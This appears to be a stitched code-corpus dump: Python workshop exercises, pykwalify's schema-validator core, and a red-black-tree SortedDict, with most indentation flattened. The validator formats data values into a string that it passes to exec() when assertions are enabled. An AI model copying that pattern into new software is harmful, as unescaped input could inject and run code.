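# --- and that return_outputs is the XSOAR helper available in the execution environment) ---
#   readable += f"{calculated_severity=}\n"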
```
#### File: py38workshop/3.8/walrus.py
```python
response = {"username": "username", "password": "<PASSWORD>"}
db = list()
def add_user(user_obj):
password = response.get("password")
if len(password) < 5:
return "Password is shorter than 5 characters."
else:
db.append(user_obj)
return "User has been added."
print(add_user(response))
print(db)
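# --- Possible walrus-operator version (a sketch of one way to solve the exercise;
# --- the function name add_user_walrus is made up and not part of the original file) ---
def add_user_walrus(user_obj):
    # bind and test the password in a single expression (PEP 572)
    if len(password := user_obj.get("password", "")) < 5:
        return "Password is shorter than 5 characters."
    db.append(user_obj)
    return "User has been added."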
```
#### File: py38workshop/3.9/hints.py
```python
from typing import Dict, Union
def backstreet_singer(obj: Union[Dict[str, str], str]):
if isinstance(obj, str):
print(obj)
else:
flag = False
for key, value in obj.items():
if flag := value == "Tell me why":
key, value = value, key
print(key)
print(value)
if flag:
print("I want it that way")
print("\n")
if __name__ == "__main__":
backstreet_singer("Yeah\nOh yeah")
``` |
{
"source": "jochman/pykwalify",
"score": 2
} |
#### File: pykwalify/pykwalify/core.py
```python
import datetime
import json
import logging
import os
import re
import sys
import traceback
import time
from io import open
from importlib.machinery import SourceFileLoader
# pyKwalify imports
import pykwalify
from pykwalify.compat import unicode, nativestr, basestring
from pykwalify.errors import CoreError, SchemaError, NotMappingError, NotSequenceError
from pykwalify.rule import Rule
from pykwalify.types import is_scalar, is_string, tt
# 3rd party imports
from dateutil.parser import parse
from pykwalify.compat import yml
from ruamel.yaml.constructor import Constructor
log = logging.getLogger(__name__)
class Core(object):
""" Core class of pyKwalify """
def __init__(self, source_file=None, schema_files=None, source_data=None, schema_data=None, extensions=None, strict_rule_validation=False,
fix_ruby_style_regex=False, allow_assertions=False, file_encoding=None, schema_file_obj=None, data_file_obj=None):
"""
:param extensions:
List of paths to python files that should be imported and made available via the 'func' keyword.
This list of extensions can be set manually or they should be provided by the `--extension`
flag from the cli. This list should not contain files specified by the `extensions` list keyword
that can be defined at the top level of the schema.
"""
if schema_files is None:
schema_files = []
if extensions is None:
extensions = []
log.debug(u"source_file: %s", source_file)
log.debug(u"schema_file: %s", schema_files)
log.debug(u"source_data: %s", source_data)
log.debug(u"schema_data: %s", schema_data)
log.debug(u"extension files: %s", extensions)
self.source = None
self.schema = None
self.validation_errors = None
self.validation_errors_exceptions = None
self.root_rule = None
self.extensions = extensions
self.errors = []
self.strict_rule_validation = strict_rule_validation
self.fix_ruby_style_regex = fix_ruby_style_regex
self.allow_assertions = allow_assertions
# Patch in all the normal python types into the yaml load instance so we can use all the
# internal python types in the yaml loading.
yml.constructor.add_constructor('tag:yaml.org,2002:python/bool', Constructor.construct_yaml_bool)
yml.constructor.add_constructor('tag:yaml.org,2002:python/complex', Constructor.construct_python_complex)
yml.constructor.add_constructor('tag:yaml.org,2002:python/dict', Constructor.construct_yaml_map)
yml.constructor.add_constructor('tag:yaml.org,2002:python/float', Constructor.construct_yaml_float)
yml.constructor.add_constructor('tag:yaml.org,2002:python/int', Constructor.construct_yaml_int)
yml.constructor.add_constructor('tag:yaml.org,2002:python/list', Constructor.construct_yaml_seq)
yml.constructor.add_constructor('tag:yaml.org,2002:python/long', Constructor.construct_python_long)
yml.constructor.add_constructor('tag:yaml.org,2002:python/none', Constructor.construct_yaml_null)
yml.constructor.add_constructor('tag:yaml.org,2002:python/str', Constructor.construct_python_str)
yml.constructor.add_constructor('tag:yaml.org,2002:python/tuple', Constructor.construct_python_tuple)
yml.constructor.add_constructor('tag:yaml.org,2002:python/unicode', Constructor.construct_python_unicode)
if data_file_obj:
try:
self.source = yml.load(data_file_obj.read())
except Exception as e:
raise CoreError("Unable to load data_file_obj input")
if schema_file_obj:
try:
self.schema = yml.load(schema_file_obj.read())
except Exception as e:
raise CoreError("Unable to load schema_file_obj")
if source_file is not None:
if not os.path.exists(source_file):
raise CoreError(u"Provided source_file do not exists on disk: {0}".format(source_file))
with open(source_file, "r", encoding=file_encoding) as stream:
if source_file.endswith(".json"):
self.source = json.load(stream)
elif source_file.endswith(".yaml") or source_file.endswith('.yml'):
self.source = yml.load(stream)
else:
raise CoreError(u"Unable to load source_file. Unknown file format of specified file path: {0}".format(source_file))
if not isinstance(schema_files, list):
raise CoreError(u"schema_files must be of list type")
# Merge all schema files into one single file for easy parsing
if len(schema_files) > 0:
schema_data = {}
for f in schema_files:
if not os.path.exists(f):
raise CoreError(u"Provided source_file do not exists on disk : {0}".format(f))
with open(f, "r", encoding=file_encoding) as stream:
if f.endswith(".json"):
data = json.load(stream)
elif f.endswith(".yaml") or f.endswith(".yml"):
data = yml.load(stream)
if not data:
raise CoreError(u"No data loaded from file : {0}".format(f))
else:
raise CoreError(u"Unable to load file : {0} : Unknown file format. Supported file endings is [.json, .yaml, .yml]")
for key in data.keys():
if key in schema_data.keys():
raise CoreError(u"Parsed key : {0} : two times in schema files...".format(key))
schema_data = dict(schema_data, **data)
self.schema = schema_data
# Nothing was loaded so try the source_data variable
if self.source is None:
log.debug(u"No source file loaded, trying source data variable")
self.source = source_data
if self.schema is None:
log.debug(u"No schema file loaded, trying schema data variable")
self.schema = schema_data
# Test if anything was loaded
if self.source is None:
raise CoreError(u"No source file/data was loaded")
if self.schema is None:
raise CoreError(u"No schema file/data was loaded")
# Merge any extensions defined in the schema with the provided list of extensions from the cli
for f in self.schema.get('extensions', []):
self.extensions.append(f)
if not (isinstance(self.extensions, list) and all(isinstance(e, str) for e in self.extensions)):
raise CoreError(u"Specified extensions must be a list of file paths")
self._load_extensions()
if self.strict_rule_validation:
log.info("Using strict rule keywords validation...")
def _load_extensions(self):
"""
Load all extension files into the namespace pykwalify.ext
"""
log.debug(u"loading all extensions : %s", self.extensions)
self.loaded_extensions = []
for f in self.extensions:
if not os.path.isabs(f):
f = os.path.abspath(f)
if not os.path.exists(f):
raise CoreError(u"Extension file: {0} not found on disk".format(f))
self.loaded_extensions.append(SourceFileLoader("", f).load_module())
log.debug(self.loaded_extensions)
log.debug([dir(m) for m in self.loaded_extensions])
def validate(self, raise_exception=True):
"""
"""
log.debug(u"starting core")
self._start_validate(self.source)
self.validation_errors = [unicode(error) for error in self.errors]
self.validation_errors_exceptions = self.errors
if self.errors is None or len(self.errors) == 0:
log.info(u"validation.valid")
else:
log.error(u"validation.invalid")
log.error(u" --- All found errors ---")
log.error(self.validation_errors)
if raise_exception:
raise SchemaError(u"Schema validation failed:\n - {error_msg}.".format(
error_msg=u'.\n - '.join(self.validation_errors)))
else:
log.error(u"Errors found but will not raise exception...")
# Return validated data
return self.source
def _start_validate(self, value=None):
"""
"""
path = ""
self.errors = []
done = []
s = {}
# Look for schema; tags so they can be parsed before the root rule is parsed
for k, v in self.schema.items():
if k.startswith("schema;"):
log.debug(u"Found partial schema; : %s", v)
r = Rule(schema=v)
log.debug(u" Partial schema : %s", r)
pykwalify.partial_schemas[k.split(";", 1)[1]] = r
else:
# re-add all items that are not schema; entries so they can be parsed
s[k] = v
self.schema = s
log.debug(u"Building root rule object")
root_rule = Rule(schema=self.schema)
self.root_rule = root_rule
log.debug(u"Done building root rule")
log.debug(u"Root rule: %s", self.root_rule)
self._validate(value, root_rule, path, done)
def _validate(self, value, rule, path, done):
"""
"""
log.debug(u"Core validate")
log.debug(u" Root validate : Rule: %s", rule)
log.debug(u" Root validate : Rule_type: %s", rule.type)
log.debug(u" Root validate : Seq: %s", rule.sequence)
log.debug(u" Root validate : Map: %s", rule.mapping)
log.debug(u" Root validate : Done: %s", done)
if rule.required and value is None and not rule.type == 'none':
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"required.novalue : '{path}'",
path=path,
value=value.encode('unicode_escape') if value else value,
))
return
if not rule.nullable and value is None and not rule.type == 'none':
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"nullable.novalue : '{path}'",
path=path,
value=value.encode('unicode_escape') if value else value,
))
return
log.debug(u" ? ValidateRule: %s", rule)
if rule.include_name is not None:
self._validate_include(value, rule, path, done=None)
elif rule.sequence is not None:
self._validate_sequence(value, rule, path, done=None)
elif rule.mapping is not None or rule.allowempty_map:
self._validate_mapping(value, rule, path, done=None)
else:
self._validate_scalar(value, rule, path, done=None)
def _handle_func(self, value, rule, path, done=None):
"""
Helper function that should check if func is specified for this rule and
then handle it for all cases in a generic way.
"""
func = rule.func
# func keyword is not defined so nothing to do
if not func:
return
found_method = False
for extension in self.loaded_extensions:
method = getattr(extension, func, None)
if method:
found_method = True
# No exception should be caught here. If one is raised it should bubble up all the way.
ret = method(value, rule, path)
if ret is not True and ret is not None:
msg = '%s. Path: {path}' % unicode(ret)
self.errors.append(SchemaError.SchemaErrorEntry(
msg=msg,
path=path,
value=None))
# If False or None or some other object that is interpreted as False
if not ret:
raise CoreError(u"Error when running extension function : {0}".format(func))
# Only run the first matched function. Since the loading order is deterministic,
# it is easy to tell which extension file takes precedence over the others.
break
if not found_method:
raise CoreError(u"Did not find method '{0}' in any loaded extension file".format(func))
def _validate_include(self, value, rule, path, done=None):
"""
"""
# TODO: It is difficult to get a good test case to trigger this if case
if rule.include_name is None:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u'Include name not valid',
path=path,
value=value.encode('unicode_escape')))
return
include_name = rule.include_name
partial_schema_rule = pykwalify.partial_schemas.get(include_name)
if not partial_schema_rule:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Cannot find partial schema with name '{include_name}'. Existing partial schemas: '{existing_schemas}'. Path: '{path}'",
path=path,
value=value,
include_name=include_name,
existing_schemas=", ".join(sorted(pykwalify.partial_schemas.keys()))))
return
self._validate(value, partial_schema_rule, path, done)
def _validate_sequence(self, value, rule, path, done=None):
"""
"""
log.debug(u"Core Validate sequence")
log.debug(u" Sequence : Data: %s", value)
log.debug(u" Sequence : Rule: %s", rule)
log.debug(u" Sequence : RuleType: %s", rule.type)
log.debug(u" Sequence : Path: %s", path)
log.debug(u" Sequence : Seq: %s", rule.sequence)
log.debug(u" Sequence : Map: %s", rule.mapping)
if len(rule.sequence) <= 0:
raise CoreError(u"Sequence must contains atleast one item : {0}".format(path))
if value is None:
log.debug(u" * Core seq: sequence data is None")
return
if not isinstance(value, list):
if isinstance(value, str):
value = value.encode('unicode_escape')
self.errors.append(SchemaError.SchemaErrorEntry(
u"Value '{value}' is not a list. Value path: '{path}'",
path,
value,
))
return
# Handle 'func' argument on this sequence
self._handle_func(value, rule, path, done)
ok_values = []
error_tracker = []
unique_errors = {}
map_unique_errors = {}
for i, item in enumerate(value):
processed = []
for r in rule.sequence:
tmp_errors = []
try:
# Create a sub core object to enable error tracking that do not
# collide with this Core objects errors
tmp_core = Core(source_data={}, schema_data={})
tmp_core.fix_ruby_style_regex = self.fix_ruby_style_regex
tmp_core.allow_assertions = self.allow_assertions
tmp_core.strict_rule_validation = self.strict_rule_validation
tmp_core.loaded_extensions = self.loaded_extensions
tmp_core._validate(item, r, "{0}/{1}".format(path, i), done)
tmp_errors = tmp_core.errors
except NotMappingError:
# For example: if the type was specified as 'map' but the data
# was 'str', an exception will be thrown and we should ignore it
pass
except NotSequenceError:
# For example: if the type was specified as 'seq' but the data
# was 'str', an exception will be thrown and we should ignore it
pass
processed.append(tmp_errors)
if r.type == "map":
log.debug(u" * Found map inside sequence")
unique_keys = []
if r.mapping is None:
log.debug(u" + No rule to apply, prolly because of allowempty: True")
return
for k, _rule in r.mapping.items():
log.debug(u" * Key: %s", k)
log.debug(u" * Rule: %s", _rule)
if _rule.unique or _rule.ident:
unique_keys.append(k)
if len(unique_keys) > 0:
for v in unique_keys:
table = {}
for j, V in enumerate(value):
# If the key does not exist it should be ignored by unique, because that is not a broken constraint
val = V.get(v, None)
if val is None:
continue
if val in table:
curr_path = "{0}/{1}/{2}".format(path, j, v)
prev_path = "{0}/{1}/{2}".format(path, table[val], v)
s = SchemaError.SchemaErrorEntry(
msg=u"Value '{duplicate}' is not unique. Previous path: '{prev_path}'. Path: '{path}'",
path=curr_path,
value=value,
duplicate=val,
prev_path=prev_path,
)
map_unique_errors[s.__repr__()] = s
else:
table[val] = j
elif r.unique:
log.debug(u" * Found unique value in sequence")
table = {}
for j, val in enumerate(value):
if val is None:
continue
if val in table:
curr_path = "{0}/{1}".format(path, j)
prev_path = "{0}/{1}".format(path, table[val])
s = SchemaError.SchemaErrorEntry(
msg=u"Value '{duplicate}' is not unique. Previous path: '{prev_path}'. Path: '{path}'",
path=curr_path,
value=value,
duplicate=val,
prev_path=prev_path,
)
unique_errors[s.__repr__()] = s
else:
table[val] = j
error_tracker.append(processed)
no_errors = []
for _errors in processed:
no_errors.append(len(_errors) == 0)
if rule.matching == "any":
log.debug(u" * any rule %s", True in no_errors)
ok_values.append(True in no_errors)
elif rule.matching == "all":
log.debug(u" * all rule".format(all(no_errors)))
ok_values.append(all(no_errors))
elif rule.matching == "*":
log.debug(u" * star rule", "...")
ok_values.append(True)
for _error in unique_errors:
self.errors.append(_error)
for _error in map_unique_errors:
self.errors.append(_error)
log.debug(u" * ok : %s", ok_values)
# All values must pass the validation, otherwise add the parsed errors
# to the global error list and throw up some error.
if not all(ok_values):
# Ignore checking for '*' type because it should always go through
if rule.matching == "any":
log.debug(u" * Value: %s did not validate against one or more sequence schemas", value)
elif rule.matching == "all":
log.debug(u" * Value: %s did not validate against all possible sequence schemas", value)
for i, is_ok in enumerate(ok_values):
if not is_ok:
for error in error_tracker[i]:
for e in error:
self.errors.append(e)
log.debug(u" * Core seq: validation recursivley done...")
if rule.range is not None:
rr = rule.range
self._validate_range(
rr.get("max"),
rr.get("min"),
rr.get("max-ex"),
rr.get("min-ex"),
len(value),
path,
"seq",
)
def _validate_mapping(self, value, rule, path, done=None):
"""
"""
log.debug(u"Validate mapping")
log.debug(u" Mapping : Data: %s", value)
log.debug(u" Mapping : Rule: %s", rule)
log.debug(u" Mapping : RuleType: %s", rule.type)
log.debug(u" Mapping : Path: %s", path)
log.debug(u" Mapping : Seq: %s", rule.sequence)
log.debug(u" Mapping : Map: %s", rule.mapping)
if not isinstance(value, dict):
self.errors.append(SchemaError.SchemaErrorEntry(
u"Value '{value}' is not a dict. Value path: '{path}'",
path,
value,
))
return
if rule.mapping is None:
log.debug(u" + No rule to apply, prolly because of allowempty: True")
return
# Handle 'func' argument on this mapping
self._handle_func(value, rule, path, done)
m = rule.mapping
log.debug(u" Mapping: Rule-Mapping: %s", m)
if rule.range is not None:
r = rule.range
self._validate_range(
r.get("max"),
r.get("min"),
r.get("max-ex"),
r.get("min-ex"),
len(value),
path,
"map",
)
for k, rr in m.items():
# Handle if the value of the key contains a include keyword
if rr.include_name is not None:
include_name = rr.include_name
partial_schema_rule = pykwalify.partial_schemas.get(include_name)
if not partial_schema_rule:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Cannot find partial schema with name '{include_name}'. Existing partial schemas: '{existing_schemas}'. Path: '{path}'",
path=path,
value=value,
include_name=include_name,
existing_schemas=", ".join(sorted(pykwalify.partial_schemas.keys()))))
return
rr = partial_schema_rule
# Find out if this is a regex rule
is_regex_rule = False
required_regex = ""
for regex_rule in rule.regex_mappings:
if k == "regex;({})".format(regex_rule.map_regex_rule) or k == "re;({})".format(regex_rule.map_regex_rule):
is_regex_rule = True
required_regex = regex_rule.map_regex_rule
# Check for the presence of the required key
is_present = False
if not is_regex_rule:
is_present = k in value
else:
is_present = any([re.search(required_regex, v) for v in value])
# Specifying =: as key is considered the "default" if no other keys match
if rr.required and not is_present and k != "=":
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Cannot find required key '{key}'. Path: '{path}'",
path=path,
value=value,
key=k))
if k not in value and rr.default is not None:
value[k] = rr.default
for k, v in value.items():
# If no other case was a match, check if a default mapping is valid/present and use
# that one instead
r = m.get(k, m.get('='))
log.debug(u" Mapping-value : %s", m)
log.debug(u" Mapping-value : %s %s", k, v)
log.debug(u" Mapping-value : %s", r)
regex_mappings = [(regex_rule, re.search(regex_rule.map_regex_rule, str(k))) for regex_rule in rule.regex_mappings]
log.debug(u" Mapping-value: Mapping Regex matches: %s", regex_mappings)
if r is not None:
# validate recursively
log.debug(u" Mapping-value: Core Map: validate recursively: %s", r)
self._validate(v, r, u"{0}/{1}".format(path, k), done)
elif any(regex_mappings):
sub_regex_result = []
# Found at least one that matches a mapping regex
for mm in regex_mappings:
if mm[1]:
log.debug(u" Mapping-value: Matching regex patter: %s", mm[0])
self._validate(v, mm[0], "{0}/{1}".format(path, k), done)
sub_regex_result.append(True)
else:
sub_regex_result.append(False)
if rule.matching_rule == "any":
if any(sub_regex_result):
log.debug(u" Mapping-value: Matched at least one regex")
else:
log.debug(u" Mapping-value: No regex matched")
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Key '{key}' does not match any regex '{regex}'. Path: '{path}'",
path=path,
value=value,
key=k,
regex="' or '".join(sorted([mm[0].map_regex_rule for mm in regex_mappings]))))
elif rule.matching_rule == "all":
if all(sub_regex_result):
log.debug(u" Mapping-value: Matched all regex rules")
else:
log.debug(u" Mapping-value: Did not match all regex rules")
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Key '{key}' does not match all regex '{regex}'. Path: '{path}'",
path=path,
value=value,
key=k,
regex="' and '".join(sorted([mm[0].map_regex_rule for mm in regex_mappings]))))
else:
log.debug(u" Mapping-value: No mapping rule defined")
else:
if not rule.allowempty_map:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Key '{key}' was not defined. Path: '{path}'",
path=path,
value=value,
key=k))
def _validate_scalar(self, value, rule, path, done=None):
"""
"""
log.debug(u"Validate scalar")
log.debug(u" Scalar : Value : %s", value)
log.debug(u" Scalar : Rule : %s", rule)
log.debug(u" Scalar : RuleType : %s", rule.type)
log.debug(u" Scalar : Path %s", path)
# Handle 'func' argument on this scalar
self._handle_func(value, rule, path, done)
if rule.assertion is not None:
self._validate_assert(rule, value, path)
if value is None:
return True
if rule.enum is not None and value not in rule.enum:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Enum '{value}' does not exist. Path: '{path}' Enum: {enum_values}",
path=path,
value=nativestr(value) if tt['str'](value) else value,
enum_values=rule.enum,
))
# Set default value
if rule.default and value is None:
value = rule.default
if not self._validate_scalar_type(value, rule.type, path):
return
if value is None:
return
if rule.pattern is not None:
#
# Try to trim away the surrounding slashes around ruby style /<regex>/ if they are defined.
# This is a quirk from ruby that they define regex patterns with surrounding slashes.
# Docs on how ruby regex works can be found here: https://ruby-doc.org/core-2.4.0/Regexp.html
# The original ruby implementation uses this code to validate patterns
# unless value.to_s =~ rule.regexp
# Because Python does not work with surrounding slashes, we have to trim them away in order to make the regex work
#
if rule.pattern.startswith('/') and rule.pattern.endswith('/') and self.fix_ruby_style_regex:
rule.pattern = rule.pattern[1:-1]
log.debug("Trimming slashes around ruby style regex. New pattern value: '{0}'".format(rule.pattern))
try:
log.debug("Matching pattern '{0}' to regex '{1}".format(rule.pattern, value))
res = re.match(rule.pattern, value, re.UNICODE)
except TypeError:
res = None
if res is None: # Not matching
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value '{value}' does not match pattern '{pattern}'. Path: '{path}'",
path=path,
value=nativestr(str(value)),
pattern=rule._pattern))
else:
log.debug("Pattern matched...")
if rule.range is not None:
if not is_scalar(value):
raise CoreError(u"value is not a valid scalar")
r = rule.range
try:
v = len(value)
value = v
except Exception:
pass
self._validate_range(
r.get("max"),
r.get("min"),
r.get("max-ex"),
r.get("min-ex"),
value,
path,
"scalar",
)
if rule.length is not None:
self._validate_length(
rule.length,
value,
path,
'scalar',
)
# Validate timestamp
if rule.type == "timestamp":
self._validate_scalar_timestamp(value, path)
if rule.type == "date":
if not is_scalar(value):
raise CoreError(u'value is not a valid scalar')
date_format = rule.format
self._validate_scalar_date(value, date_format, path)
def _validate_scalar_timestamp(self, timestamp_value, path):
"""
"""
def _check_int_timestamp_boundaries(timestamp):
"""
"""
if timestamp < 1:
# Timestamp integers can't be negative
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Integer value of timestamp can't be below 0",
path=path,
value=timestamp,
timestamp=str(timestamp),
))
if timestamp > 2147483647:
# Timestamp integers can't be above the upper limit of
# 32 bit integers
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Integer value of timestamp can't be above 2147483647",
path=path,
value=timestamp,
timestamp=str(timestamp),
))
if isinstance(timestamp_value, (int, float)):
_check_int_timestamp_boundaries(timestamp_value)
elif isinstance(timestamp_value, datetime.datetime):
# Datetime objects currently have nothing to validate.
# In the future, more options will be added to datetime validation
pass
elif isinstance(timestamp_value, basestring):
v = timestamp_value.strip()
# parse("") will give a valid date but it should not be
# considered a valid timestamp
if v == "":
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Timestamp value is empty. Path: '{path}'",
path=path,
value=nativestr(timestamp_value),
timestamp=nativestr(timestamp_value)))
else:
# A string can contain a valid unit timestamp integer. Check if it is valid and validate it
try:
int_v = int(v)
_check_int_timestamp_boundaries(int_v)
except ValueError:
# Just continue to parse it as a timestamp
try:
parse(timestamp_value)
# If it can be parsed then it is valid
except Exception:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Timestamp: '{timestamp}'' is invalid. Path: '{path}'",
path=path,
value=nativestr(timestamp_value),
timestamp=nativestr(timestamp_value)))
else:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid timestamp",
path=path,
value=timestamp_value,
timestamp=timestamp_value,
))
def _validate_scalar_date(self, date_value, date_formats, path):
log.debug(u"Validate date : %(value)s : %(format)s : %(path)s" % {
'value': date_value,
'format': date_formats,
'path': path,
})
if isinstance(date_value, str):
# If a date_format is specified then use strptime on all formats
# If no date_format is specified then use dateutil.parse() to test the value
log.debug(date_formats)
if date_formats:
# Run through all date_formats and it is valid if at least one of them passes time.strptime() parsing
valid = False
for date_format in date_formats:
try:
time.strptime(date_value, date_format)
valid = True
except ValueError:
pass
if not valid:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid date: {value} format: {format}. Path: '{path}'",
path=path,
value=date_value,
format=date_format,
))
return
else:
try:
parse(date_value)
except ValueError:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid date: {value} Path: '{path}'",
path=path,
value=date_value,
))
elif isinstance(date_value, (datetime.date, datetime.datetime)):
# If the object already is a datetime or date object it passes validation
pass
else:
# If value is any other type then raise error
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid date: {value} date must be a string or a datetime.date not a '{type}'",
path=path,
value=date_value,
type=type(date_value).__name__,
))
def _validate_length(self, rule, value, path, prefix):
if not is_string(value):
raise CoreError("Value: '{0}' must be a 'str' type for length check to work".format(value))
value_length = len(str(value))
max_, min_, max_ex, min_ex = rule.get('max'), rule.get('min'), rule.get('max-ex'), rule.get('min-ex')
log.debug(
u"Validate length : %s : %s : %s : %s : %s : %s",
max_, min_, max_ex, min_ex, value, path,
)
if max_ is not None and max_ < value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than max limit '{max_}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
max_=max_))
if min_ is not None and min_ > value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than min limit '{min_}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
min_=min_))
if max_ex is not None and max_ex <= value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than max_ex limit '{max_ex}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
max_ex=max_ex))
if min_ex is not None and min_ex >= value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than min_ex limit '{min_ex}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
min_ex=min_ex))
def _validate_assert(self, rule, value, path):
if not self.allow_assertions:
raise CoreError('To allow usage of keyword "assert" you must use cli flag "--allow-assertions" or set the keyword "allow_assert" in Core class')
# Small hack to make strings work as a value.
if isinstance(value, str):
assert_value_str = '"{0}"'.format(value)
else:
assert_value_str = '{0}'.format(value)
assertion_string = "val = {0}; assert {1}".format(assert_value_str, rule.assertion)
try:
exec(assertion_string, {}, {})
except AssertionError:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{0}' assertion expression failed ({1})".format(value, rule.assertion),
path=path,
value=value,
))
return
except Exception as err:
error_class = err.__class__.__name__
detail = err.args[0]
cl, exc, tb = sys.exc_info()
line_number = traceback.extract_tb(tb)[-1][1]
raise Exception("Unknown error during assertion\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}".format(
error_class, detail, cl, exc, tb, line_number,
))
def _validate_range(self, max_, min_, max_ex, min_ex, value, path, prefix):
"""
Validate that value is within range values.
"""
if not isinstance(value, int) and not isinstance(value, float):
raise CoreError("Value must be a integer type")
log.debug(
u"Validate range : %s : %s : %s : %s : %s : %s",
max_,
min_,
max_ex,
min_ex,
value,
path,
)
if max_ is not None and max_ < value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', greater than max limit '{max_}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
max_=max_))
if min_ is not None and min_ > value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', less than min limit '{min_}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
min_=min_))
if max_ex is not None and max_ex <= value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', greater than or equals to max limit(exclusive) '{max_ex}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
max_ex=max_ex))
if min_ex is not None and min_ex >= value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', less than or equals to min limit(exclusive) '{min_ex}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
min_ex=min_ex))
def _validate_scalar_type(self, value, t, path):
"""
"""
log.debug(u" # Core scalar: validating scalar type : %s", t)
log.debug(u" # Core scalar: scalar type: %s", type(value))
try:
if not tt[t](value):
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value '{value}' is not of type '{scalar_type}'. Path: '{path}'",
path=path,
value=unicode(value) if tt['str'](value) else value,
scalar_type=t))
return False
return True
except KeyError as e:
# Type not found in valid types mapping
log.debug(e)
raise CoreError(u"Unknown type check: {0!s} : {1!s} : {2!s}".format(path, value, t))
``` |
{
"source": "jochman/python-crbtree",
"score": 3
} |
#### File: python-crbtree/crbtree/__init__.py
```python
import collections.abc
from crbtree._rbtree import ffi, lib
__all__ = ['SortedDict']
Item = collections.namedtuple('Item', ('key', 'value'))
class SortedDict(collections.abc.MutableMapping):
"A sorted dictionary, backed by a red-black tree."
def __init__(self, *args, **kwargs):
self._rbtree = lib.rb_tree_create(lib.rb_tree_node_compare)
# This allows us to get the SortedDict Python object from a node
# removal/dealloc callback.
self._self_handle = ffi.new_handle(self)
self._rbtree.info = self._self_handle
# Track the FFI pointers to Items so they don't get garbage collected.
self._handles = set()
for key, value in kwargs.items():
self[key] = value
if args:
try:
if isinstance(args[0], list):
for item in args[0]:
self[item[0]] = item[1]
elif isinstance(args[0], dict):
for key, value in args[0].items():
self[key] = value
else:
raise ValueError
except Exception:
raise TypeError(f'Can\'t insert type {type(args[0])}')
def __del__(self):
lib.rb_tree_dealloc(self._rbtree, ffi.addressof(
lib, 'rb_tree_node_dealloc_cb'))
def __len__(self):
return lib.rb_tree_size(self._rbtree)
def _get(self, key):
item = Item(key, None) # Create item
item_p = ffi.new_handle(item) # Get its pointer
result_p = lib.rb_tree_find(
self._rbtree, item_p) # Send to command to c
if result_p == ffi.NULL: # Compare to C NULL
return (False, None)
return (True, ffi.from_handle(result_p).value)
def __contains__(self, key):
return self._get(key)[0]
def __setitem__(self, key, value):
if key in self:
del self[key]
item = Item(key, value)
item_p = ffi.new_handle(item)
self._handles.add(item_p)
if not lib.rb_tree_insert(self._rbtree, item_p):
raise RuntimeError(
"Unexpected error inserting key {!r}".format(key))
def __getitem__(self, key):
found, item = self._get(key)
if found:
return item
raise KeyError(key)
def __delitem__(self, key):
if key not in self:
raise KeyError(key)
item = Item(key, None)
item_p = ffi.new_handle(item)
removed = lib.rb_tree_remove_with_cb(
self._rbtree, item_p, lib.rb_tree_node_was_removed)
if not removed:
raise RuntimeError(
"Unexpected error removing key {!r}".format(key))
def __iter__(self):
for key, _ in self._iter():
yield key
def __eq__(self, other):
return len(self) == len(other) and sorted_mapping_eq(self, other)
def keys(self):
for key, _ in self.items():
yield key
def values(self):
for _, value in self.items():
yield value
def _iter(self):
rb_iter = lib.rb_iter_create()
try:
item_p = lib.rb_iter_first(rb_iter, self._rbtree)
while item_p != ffi.NULL:
item = ffi.from_handle(item_p)
yield (item.key, item.value)
item_p = lib.rb_iter_next(rb_iter)
finally:
lib.rb_iter_dealloc(rb_iter)
def items(self):
return self._iter()
def __repr__(self) -> str:
st = '{'
for key, value in self.items():
st += f"'{key}': {value}, "
st = st.strip(', ') + '}'
return st
@ffi.def_extern()
def rb_tree_node_compare(rb_tree_p, rb_node_a, rb_node_b):
a, b = ffi.from_handle(rb_node_a.value), ffi.from_handle(rb_node_b.value)
if a.key == b.key:
return 0
if a.key < b.key:
return -1
return 1
@ffi.def_extern()
def rb_tree_node_was_removed(rb_tree_p, rb_node_p):
ffi.from_handle(rb_tree_p.info)._handles.discard(rb_node_p.value)
